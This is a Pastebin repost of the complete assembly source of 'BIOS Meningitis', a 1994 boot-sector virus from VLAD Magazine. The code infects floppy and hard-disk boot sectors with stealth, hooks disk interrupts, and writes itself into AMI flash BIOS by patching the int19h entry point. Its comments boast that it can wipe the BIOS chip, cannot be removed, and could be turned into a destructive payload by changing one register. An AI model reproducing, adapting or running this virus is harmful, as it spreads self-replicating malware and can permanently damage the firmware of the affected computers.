FlyFar

VLAD Magazine - Issue #1 - ARTICLE.4_4 - BIOS Meningitis Virus Source Code

Jun 29th, 2023
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 11.61 KB | Cybersecurity | 0 0
  1. ;.........................................................................
  2. ;
  3. ;                    -=[ BIOS Meningitis ]=-
  4. ;                                               Qark/VLAD
  5. ;
  6. ;
  7. ;  Basic boot sector virus with a twist.
  8. ;
  9. ;  The worlds first flash BIOS infecting virus!
  10. ;
  11. ;  I _just_ fit all this into 512 bytes.  Infact there is only four bytes
  12. ;  spare... there wasn't even enough room for the name!  It used to copy
  13. ;  the partition table to the end of the virus but that is 64 bytes that
  14. ;  just couldn't spared, so now you if you boot from a floppy disk, the
  15. ;  hard disk won't be accessible.  But it's a full stealth virus apart
  16. ;  from that.
  17. ;
  18. ;  If you have flash BIOS on your computer there is a chance it will fuck
  19. ;  it up!  I'm talking wiped BIOS chip type fucked!  You WONT be able to
  20. ;  remove this virus!!!
  21. ;
  22. ;  The results of any tests of this with flash BIOS would be appreciated.
  23. ;
  24. ;  Assemble with A86 as always.
  25. ;
  26. ;.........................................................................
  27.  
  28.  
  29. ;On entry to the boot sector DL=Drive booted from.
  30.  
  31.     org     0        
  32.    
  33.     mov     si,7c00h
  34.    
  35.     xor     ax,ax
  36.     mov     es,ax
  37.  
  38.     cli
  39.     mov     ss,ax                   ;Setup the stack
  40.     mov     sp,si
  41.     sti
  42.  
  43.     mov     ds,ax                   ;DS,CS,ES,SS=0
  44.  
  45. ;***    40:[13] -       memory in k's   -  reduce by one or so          ***
  46.  
  47.     dec     word ptr [413h]         ;0:413 = Memory in K,  Sub one K.
  48.    
  49.     int     12h                     ;Get memory into AX
  50.                     ;Since memory is in K we have to
  51.                     ;multiply by 1024.  To do that we
  52.                     ;would SHL AX,10.  But because we are
  53.                     ;looking for the segment that takes
  54.                     ;4 bits off the equation.
  55.  
  56.     mov     cl,6
  57.     shl     ax,cl                   ;Thus SHL AX,6
  58.     mov     es,ax                   ;ES = Virus Segment
  59.  
  60.  
  61. ;***    read virus sector into TOM  (top of memory)     ***
  62.  
  63.     xor     di,di
  64.     mov     cx,200h
  65.     cld
  66.     rep     movsb                   ;Move virus to ES:0
  67.  
  68.     mov     ax,word ptr [13h*4]     ;Get int13h from vector table.
  69.     mov     word ptr es:[offset i13],ax
  70.     mov     ax,word ptr [13h*4+2]
  71.     mov     word ptr es:[offset i13+2],ax
  72.  
  73.     mov     word ptr [13h*4],offset handler
  74.     mov     word ptr [13h*4+2],es
  75.  
  76. already_resident:
  77.  
  78.     push    es
  79.     mov     ax,offset restart
  80.     push    ax
  81.     retf
  82.  
  83. Restart:
  84.     ;Load the original bootsector from the end of the root directory and
  85.     ;execute it.
  86.     xor     ax,ax
  87.     call    int13h
  88.  
  89.     xor     ax,ax
  90.     mov     es,ax
  91.     mov     bx,7c00h                ;Where it's meant to be.
  92.  
  93.     mov     cx,2                    ;Read HD boot strap from MBR.
  94.     xor     dh,dh
  95.     mov     ax,201h                 ;Read one sector from root directory.
  96.     cmp     dl,80h
  97.     jae     MBR_Loader
  98.     ;load up floppy
  99.     mov     cl,14                   ;Cylinder=0, Sector=14
  100.     mov     dh,1                    ;Head=1
  101.  
  102. MBR_Loader:
  103.     call    int13h
  104.  
  105.     push    dx                      ;DL=Drive we are at.
  106.  
  107.     cmp     byte ptr cs:flash_done,1   ;flash is already infected.
  108.     je      flash_resident
  109.  
  110.     call    flash_BIOS              ;Infect flash BIOS if any.
  111.  
  112. Flash_resident:
  113.  
  114.     pop     dx
  115.  
  116.     db      0eah                    ;JMPF   0000:7C00H
  117.     dw      7c00h
  118.     dw      0
  119.    
  120. Stealth:
  121.  
  122.     mov     cx,2
  123.     mov     ax,201h
  124.     cmp     dl,80h
  125.     jae     hd_stealth
  126.     mov     cl,14
  127.     mov     dh,1
  128. hd_stealth:
  129.     call    int13h
  130.     jmp     pop_exit
  131. res_test:
  132.     xchg    ah,al
  133.     iret
  134. Handler:
  135.     cmp     ax,0abbah
  136.     je      res_test
  137.     cmp     ah,2            ;Reading the first sector ?
  138.     jne     jend
  139.     cmp     cx,1
  140.     jne     jend
  141.     cmp     dh,0
  142.     jne     jend
  143.  
  144. try_infect:
  145.  
  146.     call    int13h
  147.     jc      jend
  148.  
  149.     pushf
  150.     push    ax
  151.     push    bx
  152.     push    cx
  153.     push    dx
  154.     push    si
  155.     push    di
  156.     push    es
  157.     push    ds
  158.    
  159.     ;Test if already infected.
  160.  
  161.     cmp     word ptr es:[bx + offset marker],'LV'
  162.     je      stealth                 ;Already infected.
  163.  
  164.     cmp     dl,80h                  ;C:
  165.     jb      infect_floppy
  166.    
  167.     mov     cx,2                    ;Sector 2 - Empty MBR space.
  168.     xor     dh,dh
  169.     jmp     write_virus
  170.    
  171. Infect_Floppy:
  172.     ;Store at end of root directory for floppy drives.
  173.     ;(Will fuck up on 360k but I dont give a shit!)
  174.  
  175.     mov     cx,14                   ;Cylinder=0, Sector=14
  176.     mov     dh,1                    ;Head=1
  177.  
  178. Write_Virus:        
  179.     ;Write original boot sector to spare room.
  180.  
  181.     mov     ax,301h
  182.     call    int13h
  183.     jc      pop_exit
  184.  
  185.     ;The virus is written at this point.
  186.    
  187.     push    cs
  188.     pop     es
  189.    
  190.     mov     byte ptr cs:flash_done,0
  191.  
  192.     xor     bx,bx
  193.     mov     ax,301h                 ;Write virus.
  194.     mov     cx,1
  195.     xor     dh,dh
  196.     call    int13h
  197.  
  198. Pop_Exit:
  199.     pop     ds
  200.     pop     es
  201.     pop     di
  202.     pop     si
  203.     pop     dx
  204.     pop     cx
  205.     pop     bx
  206.     pop     ax
  207.     popf
  208.  
  209.     retf    2
  210.  
  211. jend:        
  212.     db      0eah                    ;Stands for Jmpf
  213.     i13     dd      0               ;The original int13h
  214.  
  215.  
  216. Int13h  proc    near
  217.  
  218.     pushf
  219.     call    dword ptr cs:[i13]
  220.     ret
  221.  
  222. Int13h  endp
  223.    
  224. Marker  db   'VLAD'                     ;Running out of room so small
  225.                     ;marker.
  226.  
  227.  
  228. Flash_BIOS      Proc    Near
  229.  
  230. ;               Flash BIOS infection (c) 1994 Qark/VLAD!
  231.  
  232. ;Disclaimer: If any of this wrecks your computer that's your bad luck
  233. ;because you know this is dangerous code.
  234.  
  235. ;I just hope that AMIFLASH is loaded at boot and isn't a driver.  Since it's
  236. ;written by a BIOS maker you'd think so...
  237.  
  238.  
  239.     mov     ax,0e000h               ;Get flash BIOS number.
  240.     int     16h                     ;Test for its presence.
  241.     jc      no_flash_bios
  242.     cmp     al,0fah                 ;<-- gotta test this
  243.     jne     no_flash_bios
  244.    
  245. Infect_Flash:
  246.  
  247.     ;We are now working with AMIFLASH!
  248.  
  249.     ;First we'll find a nice place to store our virus.
  250.     ; We'll scan between F000-FFFF where BIOS is normally stored for
  251.     ; a 1K chunk of consecutive zeros.  (We might only need half a K
  252.     ; but I'm overplanning)
  253.  
  254.     mov     ax,0f000h               ;ROM BIOS segment
  255.     mov     ds,ax
  256.  
  257. New_segment:
  258.  
  259.     xor     si,si
  260.     xor     dx,dx
  261.  
  262. ok_new_segment:
  263.  
  264.     inc     ax
  265.     mov     ds,ax
  266.    
  267.     cmp     ax,0fff0h               ;No room for our virus.
  268.     je      no_flash_BIOS
  269. Test16:
  270.     cmp     word ptr [si],0         ;Scan words
  271.     jne     new_segment
  272.    
  273.     inc     dx                      ;DX is our free room counter.
  274.     cmp     dx,512                  ;1024 byte buffer found (512x2)
  275.     je      found_storage
  276.  
  277.     inc     si
  278.     inc     si                      ;Coz we are messing with words.
  279.  
  280.     cmp     si,16                   ;We are going up in paragraphs.
  281.     je      ok_new_segment
  282.     jmp     test16
  283.  
  284.  
  285. Found_storage:
  286.     sub     ax,40h                  ;Sub 1K (40hx16=1024)
  287.     mov     ds,ax                   ;Coz we are using segments
  288.  
  289.     mov     ax,0e001h               ;Chipset save requirement.
  290.     int     16h
  291.    
  292.     ;BX=Number of bytes to Save Chipset.
  293.  
  294.     cmp     bx,512
  295.     jbe     save_chipset
  296.  
  297.     ;We won't bother saving the chipset because it takes up more room
  298.     ;than our virus buffer can store.  Fuck em :)
  299.  
  300.     mov     byte ptr cs:chipset,1   ;Indicate we haven't saved anything.
  301.    
  302.     jmp     write_enable
  303. No_Flash_BIOS:
  304.     ret
  305. save_chipset:
  306.     mov     byte ptr cs:chipset,0   ;We've saved stuff.
  307.  
  308.     mov     al,2
  309.     push    cs
  310.     pop     es                      ;ES=CS
  311.     mov     di,offset buffer
  312.     int     16h                     ;Chipset Status to ES:DI
  313.  
  314. write_enable:
  315.  
  316.     mov     al,5
  317.     int     16h                     ;Raise Voltage (this may take time).
  318.  
  319.     mov     al,7                    ;Flash Write Enable.
  320.     int     16h
  321.  
  322.     ;Flash Memory is now writable.  I am working on nothing here
  323.     ;so I'll assume you just write to it normally and it'll be
  324.     ;put there.   If you were into writing destructive payloads
  325.     ;this would be the mother of them all.  Just load CX with 0ffffh
  326.     ;to trash their computer.  Also, leaving the computer in this
  327.     ;state for extended periods could cause damage (Dunno ? Their
  328.     ;electricity bill would go up at least :)
  329.  
  330.     push    ds
  331.     pop     es                      ;DS=ES=Place to put virus.
  332.  
  333.     xor     di,di
  334.     mov     cx,512                  ;<-- FFFF = trouble!
  335.     push    cs
  336.     pop     ds                      ;DS=CS
  337.     xor     si,si
  338.     cld
  339.     rep     movsb                   ;Move our virus into BIOS.
  340.    
  341.     ;Hopefully our virus is written ?
  342.  
  343.     ;Ok, I looked into this carefully.  At bootup int19h points
  344.     ;into the BIOS but thereafter is grabbed by various programs
  345.     ;(Dunno why, its the shittiest interrupt out).  So, if you debug
  346.     ;right now it'll point into some shadowed area or else into
  347.     ;segment 70h, but it won't at bootup which is the only time boot
  348.     ;sector viruses get executed so all is cool.
  349.  
  350.     ;What we'll do is modify the actual bytes at the entry point to
  351.     ;the interrupt.  You might think I should do something else but
  352.     ;I can't think of any other way of hooking an interrupt at bootup.
  353.  
  354.     ;Priest-P/S reckoned I should just store my virus in the Flash
  355.     ;and let the bootvirus just jump to it or something but then
  356.     ;it's not really infected methinks.  He also suggested I just modify
  357.     ;the int13h entry point and restore the bytes etc.  Well as you can
  358.     ;see from the involved code needed just to write to flash I think
  359.     ;that with a common interrupt like int13h it isn't feasible.
  360.    
  361.     ;Get Segment:Offset of original int19handler
  362.  
  363.     mov     bx,es                   ;BX=Virus Segment
  364.     xor     ax,ax
  365.     mov     ds,ax                   ;DS=Vector Table.
  366.     mov     di,word ptr [19h*4]     ;Offset of int19h
  367.     mov     es,word ptr [19h*4+2]   ;Segment of 19h
  368.  
  369.     ;Write a JMP FAR at the int19h entry point.
  370.     mov     al,0eah
  371.     stosb
  372.     mov     ax,offset int19handler
  373.     stosw
  374.     mov     ax,bx
  375.     stosw                           ;Creates a JMPF INT19HANDLER at the
  376.                     ;int19h entry point.
  377.  
  378.     mov     ax,0e004h               ;Lower Voltage.
  379.     int     16h
  380.  
  381.     mov     al,6                    ;Write Protect.
  382.     int     16h
  383.  
  384.     cmp     byte ptr cs:chipset,0
  385.     jne     No_Flash_BIOS           ;We've done for this one.
  386.  
  387.     push    cs
  388.     pop     es                      ;ES=CS
  389.  
  390.     mov     al,3
  391.     mov     di,offset buffer        ;Restore all their shit.
  392.     int     16h
  393.     jmp     no_flash_bios
  394.  
  395. chipset         db      0       ;1=chipset not saved
  396. flash_done      db      0       ;1=loaded from flash.
  397.  
  398. ;This is our own int19h handler.  The original sux because it isn't infected.
  399. ;(Strange logic :)        
  400. Int19Handler    Proc    Near
  401.    
  402.     xor     ax,ax
  403.     mov     es,ax           ;ES=0
  404.  
  405.     mov     ax,0abbah       ;ABBA - from Muriels Wedding.
  406.     int     13h
  407.  
  408.     cmp     ax,0baabh       ;BAAB - I like these.
  409.     jne     real_int19h
  410.  
  411. ;We are currently before the boot here.  Lets install our virus before
  412. ;any boot sectors or anything get loaded.
  413.  
  414.     push    cs              ;DS=0
  415.     pop     ds
  416.     cld
  417.     xor     si,si
  418.     mov     di,7c00h
  419.     mov     cx,512
  420.     rep     movsb           ;Move our virus from BIOS into boot buffer.
  421.     mov     dl,80h          ;Make it think its C:
  422.     jmp     goto_Buffer     ;Execute it.
  423.  
  424. real_int19h:
  425.     xor     ax,ax
  426.     int     13h             ;Reset disk
  427.  
  428.     mov     cx,1
  429.     mov     dh,0
  430.     mov     ax,201h
  431.     mov     bx,7c00h
  432.     cmp     dl,0
  433.     ja      hd_int19h
  434.    
  435.     int     13h             ;Read boot sector.
  436.     jc      fix_hd
  437.  
  438. Goto_Buffer:
  439.     mov     byte ptr es:[7c00h+offset flash_done],1
  440.  
  441.     db      0eah            ;JMPF 0000:7C00
  442.     dw      7c00h
  443.     dw      0
  444. Fix_HD:
  445.     mov     dl,80h          ;Boot from C:
  446. HD_Int19h:
  447.     xor     ax,ax
  448.     int     13h             ;Reset controller.
  449.     mov     ax,201h
  450.     int     13h
  451.     jc      fucked_boot
  452.     jmp     Goto_Buffer
  453.  
  454. Fucked_boot:
  455.     int     18h             ;Called when a boot ***** up
  456.  
  457. Int19Handler    EndP
  458.  
  459. Flash_BIOS      EndP
  460.  
  461. End_Virus:
  462.     DupSize equ     510 - offset End_Virus
  463.     db      DupSize dup (0)
  464.     db      55h,0aah                        ;End of Sector Marker.
  465.  
  466. Buffer:                         ;512 bytes of storage space in here.
Add Comment
Please, Sign In to add comment